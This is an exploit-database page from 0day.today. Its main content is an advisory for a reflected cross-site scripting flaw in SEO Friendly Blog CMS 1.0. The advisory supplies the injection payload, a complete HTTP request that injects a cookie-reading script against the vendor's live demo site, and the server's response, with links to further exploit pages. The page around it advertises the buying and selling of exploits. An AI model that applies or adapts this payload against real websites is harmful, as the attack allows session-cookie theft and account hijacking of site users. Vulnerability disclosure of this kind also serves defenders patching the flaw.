0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SEO Friendly Blog CMS 1.0 Cross Site Scripting Vulnerability
[## Title: SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023 XSS-Reflected Vulnerability ## Author: nu11secur1ty ## Vendor: https://technosmarter.com/ ## Software: https://github.com/technosmarter/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database ## Reference XSS: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload wi46u</title><script>alert(1)</script>fssgc was submitted in the keywords parameter. This input was echoed unmodified in the application's response. Conclusion: The `search` parameter is vulnerable for XSS-Reflected with Js injection. The malicious user can craft a very malicious URL and after this he can sending it to a very large group of people. This is very dangerous vulnerability. STATUS: CRITICAL Vulnerability [+]Exploit-XSS-test: ```XSS POST /blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/2 Host: demo.technosmarter.com Cookie: PHPSESSID=c116aa1138f1c4a490514e8bad58eef4 Content-Length: 73 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://demo.technosmarter.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demo.technosmarter.com/blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&subsearch= ``` [+]Response: ```HTTP HTTP/2 302 Found Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Location: https://demo.technosmarter.com/blog/search/<script>alert(document.cookie)</script> Content-Type: text/html; charset=UTF-8 Content-Length: 18035 Vary: Accept-Encoding Date: Wed, 17 May 2023 10:42:45 GMT Server: LiteSpeed Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/technosmarter/2023/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/seo-friendly-blog-cms-10-2023-xss.html) ## Time spend: 00:37:00 # 0day.today [2024-11-15] #